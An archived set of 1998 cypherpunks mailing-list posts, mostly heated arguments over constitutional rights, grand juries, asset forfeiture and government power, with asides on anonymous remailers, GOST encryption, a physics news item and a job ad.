Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can (fwd)
Message-ID: <199811120446.WAA27641@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 20:52:06 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can
>  call it that) [CNN] (fwd)

> 	Jim, "Grand Jury", a jury to see if there is enough evidence to
> warrant a full trial.
> 
> >Irrelevant, one doesn't throw away the justice system because it might have
> >been abused. One wrong does not justify another.
> 
> 	Correct, but this isn't a guilty or innocent trial, this is a "is
> there enough evidence to try this person" type trial.
> 
> 	This judge can't throw the perp in jail, only throw another trial
> where there will be 12 to judge.

				ARTICLE V. 
 
	No person shall be held to answer for a capital, or otherwise 
infamous crime, unless on a presentment or indictment of a Grand Jury, 
except in cases arising in the land or naval forces, or in the Militia, 
when in actual service in time of War or public danger; nor shall any 
person be subject for the same offense to be twice put in jeopardy of 
life or limb; nor shall be compelled in any criminal case to be a witness 
against himself, nor be deprived of life, liberty, or property without 
due process of law; nor shall private property be taken for public use, 
without just compensation. 
 
 
 
				ARTICLE VI. 
 
	In all criminal prosecutions, the accused shall enjoy the right 
to a speedy and public trial, by an impartial jury of the State and 
district wherein the crime shall have been committed, which district 
have been previously ascertained by law, and to be informed of the 
nature and cause of the accusation; to be confronted with the witnesses 
against him; to have compulsory process for obtaining witnesses in his 
favor, and to have Assistance of Counsel for his defence. 
 

 ----------------------------------------------------------------------------

By definition a jury is more than one, it's the reason they are implimented;
to moderate the biases of the individual.

Secondly, a judge is not impartial when acting in the stead of the state in
two capacities at one time. Especialy when by their very nature they are at
least to some degree confrontational.

Dem's da rules bubba. The Kennedy lawyers should be throwing civil right
shit fits about now.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 13:36:15 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can (fwd) [a couple of other comments]
Message-ID: <199811120514.XAA27764@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> 				ARTICLE V. 
>  
> 	No person shall be held to answer for a capital, or otherwise 
> infamous crime, unless on a presentment or indictment of a Grand Jury, 
> except in cases arising in the land or naval forces, or in the Militia, 
> when in actual service in time of War or public danger; nor shall any 
> person be subject for the same offense to be twice put in jeopardy of 
> life or limb; nor shall be compelled in any criminal case to be a witness 
> against himself, nor be deprived of life, liberty, or property without 
> due process of law; nor shall private property be taken for public use, 
> without just compensation. 

It's important to read that part about depriving life, liberty, or property
within the context of forced medication, deprivation of social contacts,
etc. before a trial has even been held. A person is innocent until proven
guilty, and that means you can deprive him of geographic freedom if they
can't pay bail. Outside of that any interruption or loss of income is the
responsibility of the state to recompensate. It should also guarantee that if
found innocent the incident won't have an impact on current or future career
and life opportunities. They're sworn to protect life, liberty, and the
pursuit of happiness with their lives if necessary. That's why their called
PUBLIC SERVANTS.

Note that property may be taken by the state through due process, private
property (my home, personal savings, papers, etc.) can't be siezed for *ANY*
reason without just compensation. Businesses and shared accounts (such as
401k's perhaps) are fair game.

I break the law and you want to take my house?

Fucking get your check book out. Otherwise it's theft and that's a crime in
principle and practice. This means that *EVERY* confiscation law on the
books yesterday, today, or tomorrow are completely illegal if they allow
confiscation of private property in relation to crime.

If the LEA's, courts, politicians, etc. really, really, really believe that
the people of this country want to allow them to confiscate their property
in relation to criminal activity then they should parent an amendment to
that effect immediately. I'll tell you now, it ain't got a hope in hell.
And when the reckoning day comes on this particular issue it's going to be a
doozie.

> 				ARTICLE VI. 
>  
> 	In all criminal prosecutions, the accused shall enjoy the right 
> to a speedy and public trial, by an impartial jury of the State and 
> district wherein the crime shall have been committed, which district 
> have been previously ascertained by law, and to be informed of the 
> nature and cause of the accusation; to be confronted with the witnesses 
> against him; to have compulsory process for obtaining witnesses in his 
> favor, and to have Assistance of Counsel for his defence. 

Note that the right to have *ASSISTANCE* of counsel is guaranteed. This
means the state must provide you an attorney to assist in the correct
process documentation *EVEN* if you represent yourself. Because it uses the
term assistance there can be no implied power of attorney without direct and
unconstrained and willing complicity by the accussed.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 12 Nov 1998 07:33:45 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Free Email as Anonymous Remailer Re: NPR is at it again...
In-Reply-To: <3.0.5.32.19981111015237.0079f350@idiom.com>
Message-ID: <Pine.BSF.3.96.981111234452.10197A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 11 Nov 1998, Bill Stewart wrote:
 
> I suspect this is what will replace the current remailer system -
> chaining through some set of Crowds, Onions, and commercial and free
> anonymizers to reach a free email system to transmit and receive email.
> An interesting project would be a free low-volume anonymizer cgi for Apache,
> given the large number of current users and the much larger number
> of people who will run web servers once they have cable modems.

How do you do chaining with a cgi?

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 11 Nov 1998 23:42:04 +0800
To: b!X <bix@geekforce.org>
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
In-Reply-To: <3.0.5.32.19981111182325.00879d50@205.83.192.13>
Message-ID: <3.0.5.32.19981112000622.0086e100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 05:27 AM 11/11/98 -0800, b!X wrote:
>
>And notice also that the 1st begins with "Congress shall make no law" while
>the 2nd begins with "a well regulated militia".

and

>Becos the attempted paraody was lame in the same ways that all attempts to
>nonrationally support 2nd amendment freedoms by calling down the gods of 1st
>amendment freeomds always are nonrational. (And no, that's not me saying
>supporting 2nd amendment freedoms is irrational; it's me saying using the
>1st amendment to do so is irrational).

Let's try this again.

Notice how, in each of the amendments below, the 1st is the only one with
the text "congress shall make no law".

This is implied, understood to be implied, accepted as implied and supreme
court ruled to be implied as applicable to each of the rest of the bill of
rights, and later to the amendments, wherein it is not so specified as in
the 1st.

A large part of the reason that 2 thru 10 and the rest do not include that
phrase is to prevent the states from doing the very thing that congress was
and is prohibited from.

Congress cannot pass any law that would infringe freedom of speech, they
cannot cause the states by threat or incentive to pass such laws either-
say by withholding highway maintenance funding a la 55.

Arbitrary out of context interpretations of documents such as this are just
that. I grant you no brownie points for comprehension, you may have earned
some demerits for instigating a straw man.

Go to the back of the class.

Reeza!

--begin pasted text--

Amendment I
Congress shall make no law respecting an establishment of religion, or
prohibiting the free exercise thereof; or abridging the freedom of speech,
or of the press; or the right of the people peaceably to assemble, and to
petition the Government for a redress of grievances.


Amendment II
A well regulated Militia, being necessary to the security of a free State,
the right of the people to keep and bear Arms, shall not be infringed. 


Amendment III
No Soldier shall, in time of peace be quartered in any house, without the
consent of the Owner, nor in time of war, but in a manner to be prescribed
by law.


Amendment IV
The right of the people to be secure in their persons, houses, papers, and
effects, against unreasonable searches and seizures, shall not be violated,
and no Warrants shall issue, but upon probable cause, supported by Oath or
affirmation, and particularly describing the place to be searched, and the
persons or things to be seized.


Amendment V
No person shall be held to answer for a capital, or otherwise infamous
crime, unless on a presentment or indictment of a Grand Jury, except in
cases arising in the land or naval forces, or in the Militia, when in
actual service in time of War or public danger; nor shall any person be
subject for the same offense to be twice put in jeopardy of life or limb;
nor shall be compelled in any criminal case to be a witness against
himself, nor be deprived of life, liberty, or property, without due process
of law; nor shall private property be taken for public use, without just
compensation.


Amendment VI
In all criminal prosecutions, the accused shall enjoy the right to a speedy
and public trial, by an impartial jury of the State and district wherein
the crime shall have been committed, which district shall have been
previously ascertained by law, and to be informed of the nature and cause
of the accusation; to be confronted with the witnesses against him; to have
compulsory process for obtaining witnesses in his favor, and to have the
Assistance of Counsel for his defense.


Amendment VII
In suits at common law, where the value in controversy shall exceed twenty
dollars, the right of trial by jury shall be preserved, and no fact tried
by a jury, shall be otherwise reexamined in any Court of the United States,
than according to the rules of the common law.


Amendment VIII
Excessive bail shall not be required, nor excessive fines imposed, nor
cruel and unusual punishments inflicted.


Amendment IX
The enumeration in the Constitution, of certain rights, shall not be
construed to deny or disparage others retained by the people.


Amendment X
The powers not delegated to the United States by the Constitution, nor
prohibited by it to the States, are reserved to the States respectively, or
to the people.

--end pasted text--


	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scoops <scoops@quiknet.com>
Date: Thu, 12 Nov 1998 16:45:11 +0800
To: cypherpunks@toad.com
Subject: Fwd: GOST
Message-ID: <199811120825.AAA03522@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Wed, 11 Nov 1998 12:50:36 -0800
>To: cypherpunks@toad.com
>From: scoops <scoops@quiknet.com>
>Subject: GOST
>
>Jetico <www.jetico.com> a Finnish company (I believe) offers a number of
encryption algorithms in its BestCrypt package, among which is GOST which
it reports having a 256 key (it also sports Blowfish and DES as I recall).
I also remember a few weeks ago reports in the press and on the List of a
porn ring broken up and some agent involved saying that the some porn was
encrypted in an old KGB program which sounded much like GOST.  The
implication is that it's transparent to the feds.  However I have no idea
about various levels at which it might be implimented.  I'm sure the real
experts on the List will fill you in. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 15:10:49 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811120647.AAA27853@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 20:34:10 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	There is an expectation that when one travels, one is protected by
> certain laws, at least the laws of the country that one is traveling to.

Absolutely, that concept does not proscribe them from making a law to
recognize the laws of other countries. It doesn't make it right but then
again the freedom of choice implies the freedom to make mistakes. It figures
that on occassion it'll be a whopper (TM).

If Penoche didn't know that Spain could extradite him from England then
he needs to hire a new lawyer. There is absolutely no expectation in the
concept of freedom that prohibits one from walking into a police station and
admitting a crime. This isn't even an issue, neither the British or the
Spanish forced him to England. And the Spanish didn't force Britian to sign
the treaty recognizing extradition. He got what he deserves. He was stupid
to have treated anyone like that and he was stupid to go to England. He is a
stupid man.

My personal view is I don't care unless I am in that country. If I have an
expectation to go somewhere I check on the laws before I'd go.

> 	There are also certain types of crimes that are so morally
> reprehensible that to allow them to continue is not possible.

Absolutely, and each country should have it's right to choose it's own
particular brand of reprehensibility recognized.

> 	Or are you willing to go on record as stating that what Stalin did
> to the Jews (or Hitler for that matter) was acceptable, since we shouldn't
> have a say in their laws?

Well, you have to understand I'm a pantheist. I know it's easy to shrug off
and say "so what" but I can't answer this exactly unless you fundamentaly
understand literal pantheism. But I'll try.

I believe there is no transcendence. As a result everything is divine
because that's all there is. To disrespect the uniqueness in anything is a
disservice to self. However, concepts of literal sin to my view simply don't
exist. The killing of a human by a human is not fundamentaly (think of it as
outside of human society, it's close but not close enough) different than a
human killing a rabbit, or crushing a rock, or painting a picture. It's an
activity, in and of itself it is nothing more than a cold, cosmic event
mediated by complete and utter indifference. The universe does not act with
anthropocentric motives or mechanations. However, within the concerns of
human biology, psychology, and society there is a very real distinction. As
a matter of fact there are quite a few. Since they are all a construct of
human existance they deserve some level of respect, the freedom of
expression in speech and press, not necessarily in action. Because of the
fundamental uniqueness of anything, to destroy or change it with willful
intent (I wish I could express this better, all I can say is it isn't what
normal English means by those two words exactly enough) except in
self-defence or survival (eg killing an animal for food) is not moraly
(permissible at the level of individual) or ethicaly (the range of
permissible acts related to an activity, say a doctor or lawyer)
supportable.

I am willing to go on record stating that what they did from a national
level should concern no nation that is not directly involved. Nations do not
have the right to impose their will on other nations, period. Nations may of
course dissolve and reform of their own free will and whim. From a personal
level everyone should have run over there in about 1936 and kicked their
stinking ass as volunteers (the fact that it is not in human nature to
participate in mass exhibitions like this voluntarily is another reason that
anarcho-whatevers won't work). From a fundamentaly cosmic perspective what
they did is completely and utterly irrelevant and of no consequence. At the
same time I'm horrified that human beings can do that to other people and
live with themselves. The total lack of empathy I find utterly chilling.
Poppy Z. Brite in carnate.

Let me give you another example, unless the US is attacked directly by Iraq
we have no business threatening, let alone initiating, violence.

But I'll do what I did the last time we got in a scrap with the rag-head,
whatever I can. To do any less might cost somebody their life through my
negligent short-term unprincipled self-interest, a sin of ommission for a man
of no sins, I won't stop bitching about it either.

Does that help any better? Life is a contradiction in motion.

> >Do you want Germany having a say in our laws (for example)?
> 
> 	They do already, it's called international trade.

Me selling apples to a German doesn't involve their having a say in my law
making unless I'm an idiot in making the laws I operate under. There are
treaties, but the assumption is that they are entered into freely and with
comprehension. If they don't and do well that's their problem.

> 	Also, if I were a Catholic in a death camp because Jesse Helms
> ramed thru legislation blaming the Y2K bug on the Holy C, I'd hope someone
> would intervine.

Congress can't make laws respecting establishments of religion. Not only
can't they support any, they can't prohibit any, they can't even
constitutionaly decide what a religion is. Per the 10th that is left to the
individual states and their respective representative constitutions.

> 	But you claimed it started in the early 1900's in response to
> deaths and blindness.

The regulation of the manufacture and sales of alcohol started after the
civil war, late 1800' and early 1900's depending on your geography. It's
impossible to set a single date since the various laws were'not all initiated
at the same time. I believe somebody else is the person who equated
prohibition with regulation. In general the laws were put in place because
either there was a problem with tainted alcohol (this was a real problem in
the very early 1900's because of the use of lead pipes and other amalgams
that don't treat people nicely) or excessive consumption by the youth
usualy (ala The Great Gatsby). The laws got a lot more draconian after
prohibition was renounced. This is when many states really jumped on the
taxation band-wagon.

The reasoning behind the taxation of alcohol is the same today as it was in
Jeffersons day. He said that the taxation was intended to reduce the use
because of its debilitating effects. Then of course there is the
consideration of what a government can do with that money as well. This
taxation is what started the Whiskey Rebellion in the late 1790's. Jefferson
finaly repealed it after quite a string of violence in the early 1800's
(sorry I don't remember the actual dates, a web search on Whiskey Rebellion
would probably turn something up). During the whole thing Washington was
riding his fat ass around buying cheap land and forceably moving people who
had lived there, in general acting the little tyrant. He was involved in at 
least two related deaths and had invested in the business and supported the
taxation.

What's really interesting is that when these taxes were intiated in the
early 1700's (originaly by the British) they were imposed on the
manufacturer not the consumer even though they were to limit the consumption
and not the manufacture.

The history of alcohol is long and twisted.

> 	It prevents the press from manipulating the government because
> there ISN'T ONE, or if there is (in the case of extreme
> libertarian/minarchist) it is so restricted and powerless it can't do
> anything execpt try to gather more power.

True, but then the news papers (they are not the same as the press - where
that commen misconception is from is beyond my keen) would just pander to
their extant major supporter, advertisers. How honest do you think that
would make them? Not very. If given the choice between the truth or a fatter
check newspapers (and their reporters) have in general chosen the way of the
greenback.

Jefferson said he would never write a line in a newspaper, and didn't. He
thought them vile. He however held the free press (he meant unrestrained
communication between individuals) in high regard (obviously).

> 	Yes, businesses can manipulate the press, and do-gooders can always
> start their own press and fight back.

Who do they buy the press parts from? The ink and paper? The distribution
channles? Etc. You might be able to start one up but you won't last long in
a monotonicly profit driven free-market. If they rake muck too much they
won't have a rake anymore.

> 	Yeah, and there are laws against Drug Dealing which work real well.

There's probably a lesson in there somewhere...

> 	I wanna say Karen something or other as one case--Silkwood?

That was one of the ones I was thinking of.

> 	Point still holds, you speak out, you get in trouble, legal or no.
> Laws don't prevent things from happening, they simply give society the
> moral authority to say "We Warned You, Now Off With His Head" or some such.

They moderate and mediate those actions and in fact do set a limit on what
can occur at the social level. I'll say it again, government isn't for
regulating individual interactions at the daily level. It's simply too fine
grain. It will control trends and behaviours with a good deal of aplomb (if
it's not abused) - and I'm talking specificaly of a republican democracy
like the US has.

Governments address the general parameters of a society.

> 	When was the last time you _didn't_ kill someone just because it is
> illegal?

Every time. I can think of three times. Two accidents hunting and the third
a crazy with a knife. On a personal level I felt my sense of justification
from committing such an act didn't equate to me spending time in jail.
They're still alive, and I didn't do time. Works for me. In all three times
I could have shot them and walked off, I wouldn't have been found and there
were no connections. All three times were completely random events,
hapinstance. I quit hunting after the second hunting event. I also don't go
for long walks on the other side of the tracks at 2am anymore when I can't
sleep. Some junior high kid tried to rob me.

> 	It's expected, but illegal?

How can it be illegal if there are no bodies to create them, courts to
ejudicate them, supposedly unbiased police to enforce them. Now if we agree
that human nature isn't going to change then there is still the unanswered
(but asked a few dozen times) as to what the exact mechanism is that
prevents abuse. Simply saying that people will find out is not historicaly
reliable, people just don't volunteer for those sorts of things. Their first
reaction is to stay out of it. Even if they find out what do they do about
it? Go to a similar business down the street that operates identicaly?

> 	It prevents government abuse, it prevents systemic abuse of power
> and authority.

Rape is rape, the point is to prevent it. Not just prevent it from your
father.

> 	It also makes it easier to get people to resist abuse & to fight
> back, since the abuse isn't built in, nor do the abusers have any sort of
> "authority" to fall back on.

People are more likely to suffer injustice as long as its sufferable. It's a
rare event to incite a large population to violence.

> 	Which is different from now HOW?

At least now there are limits to how ruthless they may be. You don't see
tanks on your street corner, there aren't troops of men running around
dragging people out of their homes because they're catholic or read 'Catcher
in the Rye' or 'Atlas Shrugged' and shooting them. And people (like us right
now) get to bitch about it with as near complete impunity as is possible in
a real world. Hell through the amendment process we can concievably bypass
the federal government completely. All that is required is the calling of a
convention, which the federal government have no authority over (especialy
since the right to peaceably assemble is protected and it don't get much more
peaceable than a constitutional convention).

> 	Isn't Billy Gates one of your poster boys for being ruthless? Isn't
> he so far head of the rest of us that he could be in court for the rest of
> his life and not spend everything?

What makes Bill Gates reprehensible is not what he did with Microsoft,
though the company as a whole should suffer. They certainly made profit
together, they should share the flip side of the coin.

Why I hold Bill Gates in so low esteem is his moral standing. A perfect
example is hurricane Mitch. The World Bank came up with a tad over $100M for
releif. Bill makes that in a few days. Here is a man with the means to
institute huge social, political, and economic change that at his level is
a pittance and he does nothing. He is scum. He made his bed, let him lie in
it. He didn't help others when they could have used it at little to no
impact to him, why should they extend a helping hand in return?

This is another excellent example of why anarcho-whatevers won't work. The
psychology of the truly wealthy is so self-interested and goal-oriented
instead of principled that they almost become pathological in their lack of
empathy. The claim is that succesful business will be some sort of utopic,
empathetic social force. It won't be, it isn't in human nature.

> 	Greed is not an agenda, it is an emotion, Profit is an agenda.

True, but there are many potential motives that drive profit, greed is the
most base one and as a result drives the lower levels of human activity.

I gotta stop now, I'm sleepy.

If I didn't get around to answering all the questions it's because there are
lots of you and only one of me...ask again in a few days and I'll answer it
then.

Good night.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 15:16:12 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: update.401 (fwd)
Message-ID: <199811120702.BAA27971@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Nov 1998 14:30:13 -0500 (EST)
> From: physnews@aip.org (AIP listserver)
> Subject: update.401

> INFLUENCE OF COSMIC RAYS ON EARTH'S CLIMATE. Do

> SUREFIRE QUANTUM ENTANGLEMENT, the ability to
> interlink two quantum particles with practically 100% certainty, has
> been achieved by a NIST group (Quentin Turchette, 303-497-3328),
> advancing hopes for ultrapowerful quantum computers.  Previously,
> physicists obtained entangled particles as a byproduct of some
> random or probabilistic process, such as the production of two
> correlated photons that occasionally occurs when a single photon
> passes through a special crystal.  Receiving entangled pairs in this
> way is fine for tests of quantum nonlocality (Update 399), but
> entangling a large number of quantum particles--essential for
> building a practical quantum computer--becomes much less likely if
> it is dependent on a probabilistic process.  In their "deterministic
> entanglement" process, the NIST researchers trap a pair of
> beryllium ions in a magnetic field.  Using a predetermined sequence
> of laser pulses, they entangle one ion's internal spin to its external
> motion, and then entangle the motion to the spin of the other atom. 
> The group believes that it will be able to entangle multiple ions with
> this process. (Turchette et al, Physical Review Letters, 26 October
> 1998.)

> THE PETAWATT is the name for what is currently the world's


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Thu, 12 Nov 1998 17:28:15 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can (fwd) [a couple of other comments]
In-Reply-To: <199811120514.XAA27764@einstein.ssz.com>
Message-ID: <199811120908.EAA06616@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



In <199811120514.XAA27764@einstein.ssz.com>, on 11/11/98 
   at 11:14 PM, Jim Choate <ravage@einstein.ssz.com> said:

>I break the law and you want to take my house?

>Fucking get your check book out. Otherwise it's theft and that's a crime
>in principle and practice. This means that *EVERY* confiscation law on
>the books yesterday, today, or tomorrow are completely illegal if they
>allow confiscation of private property in relation to crime.

>If the LEA's, courts, politicians, etc. really, really, really believe
>that the people of this country want to allow them to confiscate their
>property in relation to criminal activity then they should parent an
>amendment to that effect immediately. I'll tell you now, it ain't got a
>hope in hell. And when the reckoning day comes on this particular issue
>it's going to be a doozie.

The sheeple don't care. The government has waged an effective propaganda
campagne and only BadPeople (tm) get their property confiscated. Just like
only BadPeople (tm) drink and drive, or consume unapproved plants, or
smoke, or think BadThoughts (tm), ...ect.

The sheeple have shown time and time again that they are unworthy of
freedom and democracy that so many better men have fought and died for.
There will not be any popular outcry against this or any other
infringements by the sheeple, they are much more interested in worrying
about cum stains on party dresses (or whatever the latest circus has to
offer).

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Thu, 12 Nov 1998 22:41:33 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Nationalized Public Radio
Message-ID: <3.0.32.19981112060242.00737e6c@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Exceprts from:
"
Text of RFE/RL President Kevin Klose's Statements

Prague, July 4 (RFE/RL) -- The following is a text of introductory remarks
by RFE/RL President Kevin Klose today at Radio Free Europe/Radio Liberty:
....
On this Independence Day, 1996, the two-hundredth twentieth celebration of
the United States, we are also celebrating the second anniversary of the
decision to move Radio Free Europe and Radio Liberty to the former federal
parliament building here in Prague. We are deeply honored that Mrs.
Clinton has chosen our headquarters from which to make an historic,
Indpendence Day address. 
....
History has taught that democracy cannot live in an information vacuum.
indeed, a well-informed citizenry is essential for democracy and free-market
economies to flourish. This powerful historic truth guides our radios each
day. Our servces in 23 languages provide accurate, objective news and
information to millions of people across 11 time zones. 

Citizens in newly-emancipated lands can be freed from the past by the power
of information itself to establish civil societies. The stakes are enormous.
Civil societies that guard human freedoms across our broadcast regions can
guarantee a stable, peaceful future for all of Europe and the world. Our
mission to assist democratic change, to combat nationalism and racism, must
not falter. 
....
Here at the radios you will find 350 Czechs and Americans, and men and
women from more than 20 other countries, working in harmony and partnership
to broadcast truthful information for the sake of our homelands and the
futures of our children. 

Thank you, one and all. Thank you, Mrs. Clinton, for joining us to
celebrate our Independence Day. 


                                       (c) 1996 Radio Free Europe / Radio
Liberty, Inc.
                                                  All Rights Reserved. 
"

----------------------------------------------------------------------------
----------------------
Disclaimer: This is a review and fair use, thank you very much, or should I
pack my prison garb now?  Since freedom cannot flourish in an information
vacuum this posting is probably illegal.
----------------------------------------------------------------------------
----------------------


At 06:51 PM 11/11/98 -0500, Frederick Burroughs wrote:
>
>National Public Radio (NPR) today announced the appointment of Kevin
>Klose as the next President and CEO of NPR. His stint at The Washington
>Post included a position as Moscow Bureau Chief. He is currently
>Director of the US International Broadcasting Bureau (IBB).
>
>No need to hide your shortwave under the floorboards anymore, Voice of
>America is now on the FM airwaves. Story at:
>
>http://www.npr.org/inside/press/981111.klose.html
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mxm@candseek.com
Date: Fri, 13 Nov 1998 03:49:06 +0800
To: cypherpunks@toad.com
Subject: JOBOP Software Engineer
Message-ID: <199811121859.KAA10445@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Since your address was listed on a software engineering 
oriented site, I was hoping you could help me out. 

I am currently looking for individuals with a strong background 
in C++ development on a Windows NT platform.

I represent a leader in software development for the pharmaceutical,
cosmetic, and food industries specializing in customized 
Manufacturing Execution Systems. For this exciting, growth 
opportunity, I am looking for an individual to play a key role in 
gathering requirements from clients and relaying that information 
to an internal development team. In addition to acting as a 
liaison, this individual will also participate in the development 
of the system.

Position can work from Northern Virginia or Central Connecticut 
and we will assist in relocation expenses.

An ideal candidate will have at least 3 years of experience conducting 
C++ development on an NT platform. Communication skills are 
also important due to the interaction with both internal and 
external clients. Prior project management experience is a plus.

Salary to $90,000 with a generous benefits package.

If you know of anyone that might be interested, please forward 
this email or contact me directly.

Thank You,

Megan McCullough

Diedre Moire Corporation
510 Horizon Center
Robbinsville, NJ 08691
(609) 584-9000ext275
(609) 584-9575 (fax)
mxm@candseek.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Fri, 13 Nov 1998 03:04:57 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: "social responsibility" was (dbts: Privacy Fetishes, Perfect) (fwd)
In-Reply-To: <199811120230.UAA27385@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.981112091708.5257A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



> 
> > Date: Wed, 11 Nov 1998 19:27:21 -0700 (MST)
> > From: Jim Burnes <jvb@ssds.com>
> > Subject: Re: "social responsibility" was (dbts: Privacy Fetishes, Perfect) (fwd)
> 
> > > Actually this is the central fallacy of those that haven't bothered to
> > > actually read the federalist papers, the anti-federalist papers or the
> > > constitution, much less say how it should be amended. 
> 
> That's an easy way to brush aside having to prove your point. Especialy
> after having drawn a completely illogical and incorrect conclusion like
> this.
> 

perhaps.  it just seems so unbelievable that someone who had read all
these would not understand that the US was founded as a constitutional
republic with limited *powers*, a bill of *rights* that points out the
rights that people already had and should protect.

> > > If a constitutional amendment had to have been passed it would have been
> > > to give the federal government unlimited power to do what they believe is
> > > in the interests of our general welfare.
> 
> This sentence makes no sense, mind rewording it so I know specificaly what
> it is your talking about. No amendment has to be passed.
>

It makes absolute sense.  The constitution enumerates the specific powers
of the federal government.  Please go get a copy and read it. You would
have to create an amendment to give the federal government unlimited
powers.  For example, if the constitution had been written otherwise
prohibition would never have needed an amendment.  Legislators would
just have said it was for the "general welfare".  Having lived in the
early 1900's and educated in the previous century they were still under
the delusion that they lived in a republic.
 
> >   Madison explicitly addressed
> > > the issue of unlimited federal power emanating from the welfare clause.
> 
> Would you mind explaining where providing for the *general* welfare equates
> to unlimited powers?

I can't explain it to you because I don't believe it.  I can tell you
that that specific clause is what exploded the size and scope of federal
power.  It was specifically pointed to by the 1937 supreme court re the
social (in)security decision.  If you would like chapter and verse I can 
probably track it down.  The supremes in 1937 used it and you used
it in your email when you said that the general welfare clause was the
the reason we had some sort of social contract.

I can tell you that if you read the general welfare clause as meaning
the feds have the power to do whatever the legislators and the executive
believe is in our own best interests -- that opens them up to virtually
unlimited powers.  I'm sure Hitler, Mao and Stalin believed they were
doing what was in the interests of the "general welfare" also.  91 million
dead later you have your answer. Oops..I forgot about the Khmer Rouge..
make that 92 million.  The problem with that kind of "general welfare"
is that it is fundamentally incompatible with individual rights.

> No government has unlimited powers and providing for
> the general welfare can't honestly be extrapolated to that conclusion.

Tell that to Hitler, Mao and Stalin.  Tell that to the Japanese 
Americans that were interned in prison camps.  Have we arrived at
unlimited power yet, Jim?  How about burning children alive in their
own church without those responsible being punished?  Have we arrived
at unlimited power yet, Jim?

> Within the context of the Constitution general welfare is in reference to
> building a framework for the expression of life, liberty, and the pursuit of
> happiness.
> 

As much as I love Jefferson's prose, that is a part of the declaration
of independence and not the constitution.  The DOI is a document of 
intent, the constitution is a document of law.  The general welfare
